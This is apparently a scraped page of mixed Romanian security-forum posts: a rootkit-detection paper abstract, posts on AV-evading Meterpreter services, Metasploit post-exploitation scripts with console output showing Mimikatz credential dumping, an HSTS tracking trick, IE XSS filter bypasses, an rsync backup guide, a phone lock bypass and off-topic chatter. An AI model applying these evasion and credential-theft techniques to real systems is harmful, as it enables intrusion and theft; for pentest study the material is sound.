for Programmers (Part 1: Introduction) | MalwareTech1 point
-
UNVEILING THE KERNEL: ROOTKIT DISCOVERY USING SELECTIVE AUTOMATED KERNEL MEMORY DIFFERENCING Ahmed Zaki & Benjamin Humphrey Sophos, UK Email {ahmed.zaki, benjamin.humphrey}@ sophos.com ABSTRACT As an increasing number of automated malware analysis systems become mainstream, the emphasis on the relevance of the data extracted from the analysis task increases. Conceptually, automated malware analysis systems provide information about a sample and also identify modifi cations to a computer system induced by the sample. Traditionally, the focus of such analysis systems has primarily been on monitoring process, disk and network-level behaviour with varying levels of granularity. While providing a varied set of information, these systems offer limited ability to identify and classify rootkits. The very nature of rootkits makes them hard to classify (and in some cases even detect) using these scanning techniques. Kernel memory modifi cations can indicate that samples are trying to conceal information or hijack execution paths, thus exhibiting malicious behaviour. In an environment with a large throughput of analysis jobs, the need arises for an effi cient and accurate way to identify such complex threats that could otherwise be misclassifi ed or pass unnoticed. We present a system for identifying rootkit samples that is based on automated analysis. In this system we recognize the performance and memory constraints of a highthroughput environment; instead of monitoring modifi cations to the whole memory, we capture changes to data structures and memory regions that, on a Microsoft Windows operating system, are known to have been targeted by rootkits in the past. We explain the reasons behind the design decisions and how they have refl ected on identifying different classes of rootkits. In our research, we also explore the effectiveness of using this model as a standalone component to identify malicious behaviour. In order to do this, we run a large set of known clean versus malicious fi les to identify traits that could be indicative of malicious activity. Download: https://www.virusbtn.com/pdf/conference/vb2014/VB2014-ZakiHumphrey.pdf1 point
-
AV Evading Meterpreter Shell from a .NET Service Update: I tried this in April 2013, and it still works quite well if you obfuscate the .net (e.g. using dotfuscator or there are plenty of free ones). I still use the generic idea for SMB type things, like NTLM relaying. That said, for simply evading AV, I highly recommend going the powershell route instead. Powersploit has meterpreter connectback built in, so you don’t even need to do anything. It’s awesome https://github.com/mattifestation/PowerSploit Quite a few successful attacks rely on creating a malicious service at some point in the attack chain. This can be very useful for a couple reasons. First, in post exploitation scenarios these services are persistent, and (although noisy) these can be set to start when a connection fails or across reboots. Second, malicious services are also an extremely common way that boxes are owned in the first place – it’s part of how psexec and smb NTLM relaying work. In Metasploit by default, these are exploit modules most commonly used by selecting from their available payloads. One thing people may not realize is that these payloads are just turned into service binaries and then executed. You don’t need to necessarily use low level machine code – your “shellcode” can just be written in .NET if you want. The strategy I’ll use here is to create a stage 1 .NET meterpreter service that connects back to our stage 2 host. Maybe the easiest way to create a service is to use Visual Studio. Go to new project, and select Window Service, which should give you a nice skeleton. Generate our stage 1 and put it in a C# byte array format. I wrote a python script to do this. Articol complet: AV Evading Meterpreter Shell from a .NET Service | WebstersProdigy1 point
-
A few Metasploit Post Exploit Resource Scripts Some of this code is fairly ugly and copy/pasted between files. It is meant for one-offs within a pentest, not necessarily extended and built on. Still, it’s been useful and it might be helpful for those wanting to automate similar things. Plus it was built for real, not just in a lab, so at least it works sometimes Spooler Migrate [code] This was inspired (and some bits copied) from the smart_migrate module. smart_migrate migrates to explorer.exe or starts an instance. Sometimes this isn’t what you want to do. Say you’re running as system – explorer likely is not running in this context, and starting it as system might be suspicious. Also, in my testing when meterpreter timed out it would crash the process you’re executing in, so sometimes it needed to be restarted (not to mention you might not want to migrate to something more critical for persistence). This module checks if a print spooler is running and migrates it (and if it’s not started, it starts it, then migrates to it). Usage Example: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26[/TD] [TD=class: code]meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > background [*] Backgrounding session 1... msf exploit(psexec) > setg SESSION 1 SESSION => 1 msf exploit(psexec) > resource spooler_migrate.rc [*] Processing spooler_migrate.rc for ERB directives. [*] resource (spooler_migrate.rc)> Ruby Code (917 bytes) [*] migrating to spooler [*] done migrating msf exploit(psexec) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getpid Current pid: 1248 meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [system Process] 4294967295 ... 1248 488 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe [/TD] [/TR] [/TABLE] It should not take much effort to customize the script, for example, to set it as autorun or to have it run on all sessions with system. Pivoted Mimikatz through PS Remoting or PSExex [code] During a pentest, it’s fairly common to have code execution on one host and using that host to pivot. Behold, visio skillz Although it’s usually nicer to do everything through remote powershell, there are times when it’s not available. In those cases, it might be necessary to fall back on something else like psexec. This script does the following Pivots through a session Port scans a few ports to see what services are up Runs mimikatz through remote powershell , if it’s available. This is better because the ps1 is never written to disk (this script writes powershell to our pivot box, but nothing ever touches the target box). See my coworker’s blog on the powershell details here. If remote powershell isn’t available, copy the powershell script over and psexec Additionally, this script takes user/pass arguments. This is useful, for example, if you’re executing as SYSTEM on a box nobody’s logged into but you’d like to execute as code on another box as a domain user. One obvious improvement is it could be parallized so you’re running on multiple hosts at once. This wasn’t an issue for me because my scale wasn’t that size, and this script should work fine for a few thousand hosts as long as you’re willing to let it run for a few hours. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59[/TD] [TD=class: code]msf exploit(psexec) > setg RHOST_FILE res_data/hostfile.txt RHOST_FILE => res_data/hostfile.txt msf exploit(psexec) > setg SESSION 1 SESSION => 1 msf exploit(psexec) > setg duser TEST.local\\mopey duser => TEST.local\mopey msf exploit(psexec) > setg dpass password dpass => password msf auxiliary(smb_enumshares) > resource mimikatz_remote.rc [*] Processing mimikatz_remote.rc for ERB directives. [*] resource (mimikatz_remote.rc)> Ruby Code (8313 bytes) ##################### # Beginning AD.rlundtest.local ##################### ##################### # Routing through Session 1 ##################### SESSION => 1 HOSTNAME => AD.rlundtest.local [*] AD.rlundtest.local resolves to 192.168.137.100 [*] Post module execution completed NETMASK => 255.0.0.0 SUBNET => 192.168.137.100 [*] Running module against CLIENT5 [*] Adding a route to 192.168.137.100/255.0.0.0... [*] Post module execution completed ##################### # PORTSCANNING AD.rlundtest.local ##################### RHOSTS => 192.168.137.100 PORTS => 5985,5986,445 [*] 192.168.137.100:5985 - TCP OPEN [*] 192.168.137.100:445 - TCP OPEN [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed AD.rlundtest.local SMB is enabled. Use this if remote ps is disabled Powershell looks enabled, using that rather than SMB ##################### # Running Mimikatz on RLUNDTEST.local\mopey on AD.rlundtest.local ##################### uploading to C:\Windows\TEMP\hOllYmPh.ps1 uploading to /tmp/Invoke-ReflectivePEInjection.ps1.tmp Executing the following command over remote powershell cmd /c echo "." | powershell -Executionpolicy bypass -Command "& C:\Windows\TEMP\hOllYmPh.ps1 >> "C:\Windows\TEMP\snWgndjt" saving output in /root/.msf4/logs/mimi/AD.rlundtest.local-20130927:233757.txt Cleaning remote files ##################### # Cleaning up: Resetting routes ##################### msf auxiliary(tcp) > cat //root/.msf4/logs/mimi/AD.rlundtest.local-20130927:233757.txt [*] exec: cat //root/.msf4/logs/mimi/AD.rlundtest.local-20130927:233757.txt Authentication ID : 0;996 Authentication Package : Negotiate Primary user : AD$ Domain authentication : RLUNDTEST .... [/TD] [/TR] [/TABLE] For the psexec part of this to work I submitted three pull requests to fix minor issues in how metasploit lists files. Two hav been accepted (1 2), but the other has not (at least not yet). Feel free to use that branch, or you could always use another psexec payload of your choice. The old psexec_command will also work for some payloads, they just can’t take a long time or return binary data. This should be easy to customize and can be quite useful. Say you’d like to execute a powershell script through remote powershell, wmic, or psexec (in that order of preference) but don’t know what’s enabled. You can run a modified version of this script and hit a bunch of hosts. Pivoting and Looking for Password Reuse between things [code] Another pivoting example. Say you’ve pwned one domain, like you’ve dumped the hashes from the domain controller, but want to check for password reuse on the second. This is a script for that type of scenario. Looking at the diagram below, you might say, but there’s a brick wall in front of pivot pirate. But aha, there are red arrows. Pivots through a session Picks a random host from a hostfile Checks port 445 Runs smb_login through session Usage is similar to the last couple scripts. Additionally, it could be sped up significantly if it were parallelized, but one hash at a time was plenty fast for my use. Sursa: A few Metasploit Post Exploit Resource Scripts | WebstersProdigy1 point
-
The Double-Edged Sword of HSTS Persistence and Privacy HTTP Strict Transport Security or more commonly known as HSTS is a draft policy by the IETF WebSec working group currently proposed that would extend the standard list of HTTP response headers to allow domain owners to enroll complying browsers into exclusively secure communications with the web server for an asserted period of time. This is accomplished by rewriting all HTTP requests to that particular domain regardless of entry (be it via link, image or manually typed in the address bar) over HTTPS and validating the certificate chain. If a secure connection cannot be established or the certificate chain cannot be verified then the request fails with a transport level error and is abandoned. The actual implementation of this is nearly trivial. Over a secure connection the server simply has to return the header specifying how long the browser should exclusively attempt HTTPS connections and a flag whether it should include sub-domains: Strict-Transport-Security: max-age=31536000; includeSubDomains Under normal circumstances as long as the user has been to that domain within the max-age of the policy, this is an effective mitigation against sslstrip type attacks which rely on users to initiate an HTTP connection to perform a man-in-the-middle attack against the browsers. One of the less understood implications of this proposal is the role that wildcard SSL certificates play. When purchasing an SSL certificate the domain owner must decide between a standard certificate that covers only one particular FQDN such as store.domain.com or a (more expensive) wildcard certificate issued to *.domain.com that would encompass multiple sub-domains such auth.domain.com and store.domain.com. As the certificate wildcard feature is decoupled from the HSTS includeSubDomains flag it leads to interesting behavior that allows an actor such as an advertising company or any other entity to store, retrieve, and edit data in the browser’s database. When a wildcard SSL certificate is used it allows the owner to have a near unlimited number of entires in the HSTS databases as currently implemented by supporting browsers. An entry in the HSTS database can grant a single-bit of information to an interested party that can be retrieved at a later time. Lets look at an example where we want to store and retrieve the word “HELLO” in a browser’s HSTS database using nothing but forum image tags and a trivial encoding. To set the bits we would simply need to create a post with the following tags: When a browser goes to each of these URLs over HTTPS the web server would see the /setbit.png key and include a HSTS header with a large max-age value in the response and create an entry in the browser’s HSTS table for each of the sub-domains. To read this data back out a javascript block on a different domain than the original forum would first brute force the character count by creating resource requests enumerating possible values and having the server respond whether the request came in over HTTP or HTTPS as the requests would have been rewritten by the browser if the sub-domain is present in HSTS database. These requests would look like: http://charcount-1.trackingdomain.com/getbit.png [ Server: HTTP ] http://charcount-2.trackingdomain.com/getbit.png [ Server: HTTP ] http://charcount-3.trackingdomain.com/getbit.png [ Server: HTTP ] http://charcount-4.trackingdomain.com/getbit.png [ Server: HTTP ] http://charcount-5.trackingdomain.com/getbit.png [ Server: HTTPS! ] The same brute-force enumeration process would be performed to retrieve the individual characters of the message body. This enumeration is more effective than the current history enumeration attacks via CSS (here.) At first this approach looks like a Bloom filter. Seemingly akin to burning in bits permanently and not having the ability to change them but thanks to the max-age specifier of the header it is possible to also clear bits by setting their maximum age to 0: Request URL: http://charcount-5.trackingdomain.com/clearbit.png Strict-Transport-Security: max-age=0; Initially this doesn’t look worse than standard tracking cookie as long as it is cleared on a regular basis but clearing the HSTS database frequently renders it much less effective in preventing the very attacks it sought guard against. Therein lies the classic trade-off of security versus privacy. Of the currently two HSTS supporting browsers there is no consensus on this topic. Chrome opts for increased privacy by clearing HSTS database when cookies are cleared while Firefox 4 opts to store HSTS settings in the separate and infrequently cleared site-preferences database. So what can be done about this? My proposal is to amend the draft to force the includeSubDomains flag on wildcard certificates. This would limit them to only one entry in the browsers HSTS database and make the technique above prohibitively expensive to non-CA owners as a separate signed SSL certificate would be needed for every bit of information stored and limit encoding options. That way we can have the best of both worlds, privacy and security. Posted by Mikhail Davidov Sursa: The Double-Edged Sword of HSTS Persistence and Privacy | Leviathan Security Group1 point
-
[h=1]Bypassing the IE XSS filter[/h] Wednesday, 7 January 2015 Mario noticed that the new version of the IE filter blocks anchors in attempt to prevent the same origin bypass where you double encode the vector and post a link to itself. I had to take a look and see if I could break it and…of course I did. The regex is very generic:- <a.*?hr{e}f This could cause problems with information disclosure if you can put something in between the “a” and “href” and detect if the filter is active which I’ll admit is pretty tricky now with the new protection against such attacks. Anyway lets move onto the vectors. I literally found the bypass in about 30 minutes, using an existing form it’s possible to inject a button that submits an existing form to inject the vector into itself with an encoded payload. XSS filter bypass using formaction PoC Ok onto the next bypass which is pretty simple. In the regexes they look for “http-equiv” in the meta element but forget about “charset”. Charset has worked in IE for years and even though it’s a HTML5 standard it works in quirks mode too. We can inject a UTF-7 vector which executes nicely. Here is the second Poc. XSS filter bypass using meta charset Sursa: Bypassing the IE XSS filter1 point
-
[h=2]Hackers Steal $5 Million From Bitcoin Exchange[/h] Victor Luckerson @VLuck Jan. 6, 2015 [h=2]Breach follows massive hack of Mt. Gox in 2014[/h] A European Bitcoin exchange had about $5 million worth of the cryptocurrency stolen by hackers over the weekend. The Slovenia-based Bitstamp announced the breach on its website Monday and shut down services temporarily Tuesday in order to investigate the hack. The theft totaled about 19,000 Bitcoin, but hackers were only able to access a small portion of the exchange’s total assets. While some Bitcoins are stored online, many more are kept on local hard drives in what Bitcoin users call “cold storage.” Bitstamp wrote on its website that it would ensure users’ account balances were “honored in full” despite the breach. The hack comes less than a year after the collapse of Mt. Gox, the once-massive Bitcoin exchange that lost more than $450 million worth of Bitcoin and then filed for bankruptcy. Bitcoin lost half of its value after Mt. Gox imploded. So far, though, the Bitstamp breach doesn’t seem to have negatively influenced the price of the currency. Sursa: Bitcoin Exchagne Bitstamp Loses $5 Million in Hack1 point
-
Amante de intretinut.... On: Mane, eu nu te cunosc asa bine dar vizitez forumu de 1-2 ani ca guest si am vazut ca esti activ ai posturi utile, esti un membru de baza pe aici..Sper ca poate o sa revii vreodata..1 point
-
http://dl.packetstormsecurity.net/papers/virus/BypassAVDynamics.pdf "In this first example, we just allocate and fill 100 Mega Bytes of memory. This is enough to discourage any emulation AV out there." "Attempt to access Web domains which does not exist. In the real world, it fails. In an AV, it will work since the AV will use its own simulated page." etc. merita citit, 21 pagini.1 point
-
The rsync protocol can be pretty simple to use for ordinary backup/synchronization jobs, but some of its more advanced features may surprise you. In this article, we’re going to show how even the biggest data hoarders and backup enthusiasts can wield rsync as a single solution for all of their data redundancy needs. Warning: Advanced Geeks Only If you’re sitting there thinking “What the heck is rsync?” or “I only use rsync for really simple tasks,” you may want to check out our previous article on how to use rsync to backup your data on Linux, which gives an introduction to rsync, guides you through installation, and showcases its more basic functions. Once you have a firm grasp of how to use rsync (honestly, it isn’t that complex) and are comfortable with a Linux terminal, you’re ready to move on to this advanced guide. Running rsync on Windows First, let’s get our Windows readers on the same page as our Linux gurus. Although rsync is built to run on Unix-like systems, there’s no reason that you shouldn’t be able to use it just as easily on Windows. Cygwin produces a wonderful Linux API that we can use to run rsync, so head over to their website and download the 32-bit or 64-bit version, depending on your computer. Installation is straightforward; you can keep all options at their default values until you get to the “Select Packages” screen. Now you need to do the same steps for Vim and SSH, but the packages are going to look a bit different when you go to select them, so here are some screenshots: Installing Vim: Installing SSH: After you’ve selected those three packages, keep clicking next until you finish the installation. Then you can open Cygwin by clicking on the icon that the installer placed on your desktop. rsync Commands: Simple to Advanced Now that the Windows users are on the same page, let’s take a look at a simple rsync command, and show how the use of some advanced switches can quickly make it complex. Let’s say you have a bunch of files that need backed up – who doesn’t these days? You plug in your portable hard drive so you can backup your computers files, and issue the following command: [INDENT]rsync -a /home/geek/files/ /mnt/usb/files/ [/INDENT] Or, the way it would look on a Windows computer with Cygwin: [INDENT]rsync -a /cygdrive/c/files/ /cygdrive/e/files/ [/INDENT] Pretty simple, and at that point there’s really no need to use rsync, since you could just drag and drop the files. However, if your other hard drive already has some of the files and just needs the updated versions plus the files that have been created since the last sync, this command is handy because it only sends the new data over to the hard drive. With big files, and especially transferring files over the internet, that is a big deal. Backing up your files to an external hard drive and then keeping the hard drive in the same location as your computer is a very bad idea, so let’s take a look at what it would require to start sending your files over the internet to another computer (one you’ve rented, a family member’s, etc). [INDENT]rsync -av --delete -e 'ssh -p 12345’ /home/geek/files/ geek2@10.1.1.1:/home/geek2/files/ [/INDENT] The above command would send your files to another computer with an IP address of 10.1.1.1. It would delete extraneous files from the destination that no longer exist in the source directory, output the filenames being transferred so you have an idea of what’s going on, and tunnel rsync through SSH on port 12345. The -a -v -e --delete switches are some of the most basic and commonly used; you should already know a good deal about them if you’re reading this tutorial. Let’s go over some other switches that are sometimes ignored but incredibly useful: --progress – This switch allows us to see the transfer progress of each file. It’s particularly useful when transferring large files over the internet, but can output a senseless amount of information when just transferring small files across a fast network. An rsync command with the --progress switch as a backup is in progress: --partial – This is another switch that is particularly useful when transferring large files over the internet. If rsync gets interrupted for any reason in the middle of a file transfer, the partially transferred file is kept in the destination directory and the transfer is resumed where it left off once the rsync command is executed again. When transferring large files over the internet (say, a couple of gigabytes), there’s nothing worse than having a few second internet outage, blue screen, or human error trip up your file transfer and having to start all over again. -P – this switch combines --progress and --partial, so use it instead and it will make your rsync command a little neater. -z or --compress – This switch will make rsync compress file data as it’s being transferred, reducing the amount of data that has to be sent to the destination. It’s actually a fairly common switch but is far from essential, only really benefiting you on transfers between slow connections, and it does nothing for the following types of files: 7z, avi, bz2, deb, g,z iso, jpeg, jpg, mov, mp3, mp4, ogg, rpm, tbz, tgz, z, zip. -h or --human-readable – If you’re using the --progress switch, you’ll definitely want to use this one as well. That is, unless you like to convert bytes to megabytes on the fly. The -h switch converts all outputted numbers to human-readable format, so you can actually make sense of the amount of data being transferred. -n or --dry-run – This switch is essential to know when you’re first writing your rsync script and testing it out. It performs a trial run but doesn’t actually make any changes – the would-be changes are still outputted as normal, so you can read over everything and make sure it looks okay before rolling your script into production. -R or --relative – This switch must be used if the destination directory doesn’t already exist. We will use this option later in this guide so that we can make directories on the target machine with timestamps in the folder names. --exclude-from – This switch is used to link to an exclude list that contains directory paths that you don’t want backed up. It just needs a plain text file with a directory or file path on each line. --include-from – Similar to --exclude-from, but it links to a file that contains directories and file paths of data you want backed up. --stats – Not really an important switch by any means, but if you are a sysadmin, it can be handy to know the detailed stats of each backup, just so you can monitor the amount of traffic being sent over your network and such. --log-file – This lets you send the rsync output to a log file. We definitely recommend this for automated backups in which you aren’t there to read through the output yourself. Always give log files a once over in your spare time to make sure everything is working properly. Also, it’s a crucial switch for a sysadmin to use, so you’re not left wondering how your backups failed while you left the intern in charge. Let’s take a look at our rsync command now that we have a few more switches added: [INDENT]rsync -avzhP --delete --stats --log-file=/home/geek/rsynclogs/backup.log --exclude-from '/home/geek/exclude.txt' -e 'ssh -p 12345' /home/geek/files/ geek2@10.1.1.1:/home/geek2/files/ [/INDENT] The command is still pretty simple, but we still haven’t created a decent backup solution. Even though our files are now in two different physical locations, this backup does nothing to protect us from one of the main causes of data loss: human error. Snapshot Backups If you accidentally delete a file, a virus corrupts any of your files, or something else happens whereby your files are undesirably altered, and then you run your rsync backup script, your backed up data is overwritten with the undesirable changes. When such a thing occurs (not if, but when), your backup solution did nothing to protect you from your data loss. The creator of rsync realized this, and added the --backup and --backup-dir arguments so users could run differential backups. The very first example on rsync’s website shows a script where a full backup is run every seven days, and then the changes to those files are backed up in separate directories daily. The problem with this method is that to recover your files, you have to effectively recover them seven different times. Moreover, most geeks run their backups several times a day, so you could easily have 20+ different backup directories at any given time. Not only is recovering your files now a pain, but even just looking through your backed up data can be extremely time consuming – you’d have to know the last time a file was changed in order to find its most recent backed up copy. On top of all that, it’s inefficient to run only weekly (or even less often in some cases) incremental backups. Snapshot backups to the rescue! Snapshot backups are nothing more than incremental backups, but they utilize hardlinks to retain the file structure of the original source. That may be hard to wrap your head around at first, so let’s take a look at an example. Pretend we have a backup script running that automatically backs up our data every two hours. Whenever rsync does this, it names each backup in the format of: Backup-month-day-year-time. So, at the end a typical day, we’d have a list of folders in our destination directory like this: When traversing any of those directories, you’d see every file from the source directory exactly as it was at that time. Yet, there would be no duplicates across any two directories. rsync accomplishes this with the use of hardlinking through the --link-dest=DIR argument. Of course, in order to have these nicely- and neatly-dated directory names, we’re going to have to beef up our rsync script a bit. Let’s take a look at what it would take to accomplish a backup solution like this, and then we’ll explain the script in greater detail: [INDENT]#!/bin/bash #copy old time.txt to time2.txt yes | cp ~/backup/time.txt ~/backup/time2.txt #overwrite old time.txt file with new time echo `date +”%F-%I%p”` > ~/backup/time.txt #make the log file echo “” > ~/backup/rsync-`date +”%F-%I%p”`.log #rsync command rsync -avzhPR --chmod=Du=rwx,Dgo=rx,Fu=rw,Fgo=r --delete --stats --log-file=~/backup/rsync-`date +”%F-%I%p”`.log --exclude-from '~/exclude.txt' --link-dest=/home/geek2/files/`cat ~/backup/time2.txt` -e 'ssh -p 12345' /home/geek/files/ geek2@10.1.1.1:/home/geek2/files/`date +”%F-%I%p”`/ #don’t forget to scp the log file and put it with the backup scp -P 12345 ~/backup/rsync-`cat ~/backup/time.txt`.log geek2@10.1.1.1:/home/geek2/files/`cat ~/backup/time.txt`/rsync-`cat ~/backup/time.txt`.log [/INDENT] That would be a typical snapshot rsync script. In case we lost you somewhere, let’s dissect it piece by piece: The first line of our script copies the contents of time.txt to time2.txt. The yes pipe is to confirm that we want to overwrite the file. Next, we take the current time and put it into time.txt. These files will come in handy later. The next line makes the rsync log file, naming it rsync-date.log (where date is the actual date and time). Now, the complex rsync command that we’ve been warning you about: -avzhPR, -e, --delete, --stats, --log-file, --exclude-from, --link-dest – Just the switches we talked about earlier; scroll up if you need a refresher. --chmod=Du=rwx,Dgo=rx,Fu=rw,Fgo=r – These are the permissions for the destination directory. Since we are making this directory in the middle of our rsync script, we need to specify the permissions so that our user can write files to it. The use of date and cat commands We’re going to go over each use of the date and cat commands inside the rsync command, in the order that they occur. Note: we’re aware that there are other ways to accomplish this functionality, especially with the use of declaring variables, but for the purpose of this guide, we’ve decided to use this method. The log file is specified as: [INDENT]~/backup/rsync-`date +”%F-%I%p”`.log [/INDENT] Alternatively, we could have specified it as: [INDENT]~/backup/rsync-`cat ~/backup/time.txt`.log [/INDENT] Either way, the --log-file command should be able to find the previously created dated log file and write to it. The link destination file is specified as: [INDENT]--link-dest=/home/geek2/files/`cat ~/backup/time2.txt` [/INDENT] This means that the --link-dest command is given the directory of the previous backup. If we are running backups every two hours, and it’s 4:00PM at the time we ran this script, then the --link-dest command looks for the directory created at 2:00PM and only transfers the data that has changed since then (if any). To reiterate, that is why time.txt is copied to time2.txt at the beginning of the script, so the --link-dest command can reference that time later. The destination directory is specified as: [INDENT]geek2@10.1.1.1:/home/geek2/files/`date +”%F-%I%p”` [/INDENT] This command simply puts the source files into a directory that has a title of the current date and time. Finally, we make sure that a copy of the log file is placed inside the backup. [INDENT]scp -P 12345 ~/backup/rsync-`cat ~/backup/time.txt`.log geek2@10.1.1.1:/home/geek2/files/`cat ~/backup/time.txt`/rsync-`cat ~/backup/time.txt`.log [/INDENT] We use secure copy on port 12345 to take the rsync log and place it in the proper directory. To select the correct log file and make sure it ends up in the right spot, the time.txt file must be referenced via the cat command. If you’re wondering why we decided to cat time.txt instead of just using the date command, it’s because a lot of time could have transpired while the rsync command was running, so to make sure we have the right time, we just cat the text document we created earlier. Automation Use Cron on Linux or Task Scheduler on Windows to automate your rsync script. One thing you have to be careful of is making sure that you end any currently running rsync processes before continuing a new one. Task Scheduler seems to close any already running instances automatically, but for Linux you’ll need to be a little more creative. Most Linux distributions can use the pkill command, so just be sure to add the following to the beginning of your rsync script: [INDENT]pkill -9 rsync [/INDENT] Encryption Nope, we’re not done yet. We finally have a fantastic (and free!) backup solution in place, but all of our files are still susceptible to theft. Hopefully, you’re backing up your files to some place hundreds of miles away. No matter how secure that faraway place is, theft and hacking can always be problems. In our examples, we have tunneled all of our rsync traffic through SSH, so that means all of our files are encrypted while in transit to their destination. However, we need to make sure the destination is just as secure. Keep in mind that rsync only encrypts your data as it is being transferred, but the files are wide open once they reach their destination. One of rsync’s best features is that it only transfers the changes in each file. If you have all of your files encrypted and make one minor change, the entire file will have to be retransmitted as a result of the encryption completely randomizing all of the data after any change. For this reason, it’s best/easiest to use some type of disk encryption, such as BitLocker for Windows or dm-crypt for Linux. That way, your data is protected in the event of theft, but files can be transferred with rsync and your encryption won’t hinder its performance. There are other options available that work similarly to rsync or even implement some form of it, such as Duplicity, but they lack some of the features that rsync has to offer. After you’ve setup your snapshot backups at an offsite location and encrypted your source and destination hard drives, give yourself a pat on the back for mastering rsync and implementing the most foolproof data backup solution possible. Source1 point
-
Daca saptamana trecuta ziceam de Intel Haswell, acum tin sa anunt ca si AMD vine cu forte noi pe piata. Au trecut aproape trei luni de cand AMD a lansat familia de procesoare Fusion – Richland in lumea notebook. Si acum, asteptand probabil Computex-ul, au fost introduse si modelele desktop, sase la numar. Nimic cu adevarat nou sub soare, doar o evolutie a procesoarelor Trinity de anul trecut, cu frecvente ceva mai mari. Deci arhitectura a ramas aceeasi: Piledriver (K11.5) la CPU si VLIW4 la GPU. Si acelasi proces tehnologic de 32 nm SOI la GlobalFoundries. Dar ne este promis ca Richland isi atinge mai des frecventa maxima de TurboCore, datorita unui management mai bun. Si din fericire nici socket-ul FM2 nu s-a schimbat, procesoarele Richland fiind perfect compatibile cu actualele placi de baza cu chipset-uri A85X, A75, si A55. Este nevoie doar de un update de bios. Mai mult, ele vor functiona si pe viitorul skFM2+. Dar sa vedem cum arata noile modele. Cinci dintre ele sunt Richland-uri veritabile, in timp ce al saselea arata putin mai ciudat… Cu Richland AMD a ameliorat si controller-ul de memorie, care acum suporta pana la 2133 MHz. Insa doar modelul de top are si acest avantaj. Iar fata de Trinity, sesizam o medie de 300 MHz in plus la frecventa. Si avem parte si de noile tehnologii cu care AMD incearca sa ne atraga: Gesture Control, Face Login, Screen Mirror, Quick Stream, Steady Video, Perfect Picture HD. Prima permite controlarea programelor principale (player, browser, viewer, reader) prin intermediul gesturilor manuale, in doua dimensiuni momentan, la maxim un metru de camera. A doua confera acces la conturi prin simpla recunoastere a fetei. Cea de-a treia duplica imaginea monitorului prin intermediul retelelor fara fir. Iar ultimele trei au ca sarcina ameliorarea calitatii filmelor. In plus, cu modelele A10 primim la pachet si o copie a jocului Tomb Raider 2013! Ca si overclocking, Rochland ar trebui sa se comporte mai bine decat Trinity la lansare, datorita rafinarii procesului tehnologic. Astfel, la A10-6800K frecvente de 5 – 5.1 GHz n-ar trebui sa fie prea greu de atins, in timp ce GPU-ul ar sari de 1150 MHz. Si acum sa vorbim despre performanta stoc, cel mai important aspect la lansarea oricarei componente noi. Si la acest capitol Richland dezamageste, cum a facut-o si Haswell zilele trecute. Pentru CPU sporul fata de Trinity este de 10%, iar la GPU de numai 5%. De parca AMD nu vrea sa ajunga Intel, si chiar renunta sa lupte si la IGP. Review-uri complete gasiti la LegitReviews, HotHardware, TechPowerUp, XbitLabs si Lab501. Aceste procesoare au ajuns deja in Romania, la preturi de 625 lei pentru cele doua modele A10, 500 lei pentru A8-uri si 300 lei pentru A6. Daca doriti sa achizitionati un asemenea procesor, va recomand oferta PCgarage cu preturi incepand de la 330 RON.1 point
-
O metoda eleganta de a trece peste codul de securitate al nokia 1208(posibil sa mearga si pe alte telefoane de astea mai vechi). Telefonul este blocat. Simplu, luam un telefon cu minute si dam un apel catre cartela de pe nokia 1208. Raspundem la apel si apoi dam options. Derulam in jos pana la menu si de acolo avem acces la tot telefonul fara sa fi introdus nici o parola.1 point
-
Am si eu urmatoarea situatie: Am un desktop pe care am Ubuntu 11.10 si un laptop cu Windows 7 (pe care eu folosesc BackTrack5, dar laptopul il foloseste si tata-miu si lui ii trebe win). Intrebare: cum sa fac sa am acces la folderele sheruite de windows din ubuntu (tinand cont de faptul ca userul din windows nu are parola)? Am instalat samba si functioneaza ok daca pun parola la userul de windows dar eu vreau fara parola! Am tot cautat, dar nu gasesc rezolvare decat pt varianta in care userul din windows e setat cu parola si mie nu-mi trebuie asa. Dar nici unde nu se spune ca daca nu are parola NU SE POATE ... deci trebuie sa se poata Trebuie sa-mi ramana userul de windows neparolat, dar sa pot accesa folderele sheruite din Ubuntu!1 point
-
Am si eu o intrebare! La ce poate fi folosit un slot ethernet pe un televizor? Ma uitam pe net dupa LED TV si am vazut ca unele au mufa ethernet. Nu-i vad rostul intr-un tv. Aveti vreo idee la ce e folosita? Uite aici exemplu: SAMSUNG UE32C6000 televizor led Full HD Diagonala 32 inch 81cm Rezolutie 1920 x 10801 point
-
Am si eu urmatoarea problema: - sistem de operare XP SP2 - drive C: de 20 GB - folderele si fisierele de pe C: adunate (inclusiv cele hidden si cele system) ocupa in total 8 GB si totusi imi arata ca C: este plin. Am eliberat 1 GB din fisiere temp si altele useless, dar acum vad cum la fiecare ora imi scade spatiul ramas liber (din acel 1GB) Cam ce poate sa aibe? Cine imi papa spatiul liber? Am verificat cu Avira, Malwarebytes si Microsoft Malicious Software Removal Tool si nu a gasit nimic. System Restore l-am oprit de cand am instalat windowsul.1 point
-
Baieti, ideea e buna, daca tot ati inceput va sugerez sa lucrati cat puteti la proiect pentru ca poate iesi frumos.0 points